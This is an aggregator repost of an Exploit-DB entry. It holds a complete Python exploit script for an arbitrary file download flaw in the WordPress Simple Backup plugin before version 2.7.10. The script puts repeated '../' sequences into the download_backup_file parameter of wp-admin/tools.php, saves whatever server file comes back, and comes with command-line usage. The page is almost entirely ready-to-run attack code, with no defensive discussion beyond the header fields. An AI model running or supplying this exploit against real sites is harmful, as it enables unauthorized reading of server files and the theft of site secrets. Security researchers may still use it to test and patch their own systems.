0
[webapps] Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal
source link: https://www.exploit-db.com/exploits/51937
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal
# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux
import sys
import requests
from urllib.parse import urljoin
import time
def exploit(target_url, file_name, depth):
traversal = '../' * depth
exploit_url = urljoin(target_url, '/wp-admin/tools.php')
params = {
'page': 'backup_manager',
'download_backup_file': f'{traversal}{file_name}'
}
response = requests.get(exploit_url, params=params)
if response.status_code == 200 and response.headers.get('Content-Disposition') \
and 'attachment; filename' in response.headers['Content-Disposition'] \
and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
print(response.text) # Replace with the desired action for the downloaded content
file_path = f'simplebackup_{file_name}'
with open(file_path, 'wb') as file:
file.write(response.content)
print(f'File saved in: {file_path}')
else:
print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python exploit.py <target_url> <file_name> <depth>")
sys.exit(1)
target_url = sys.argv[1]
file_name = sys.argv[2]
depth = int(sys.argv[3])
print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n")
time.sleep(5)
exploit(target_url, file_name, depth)
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK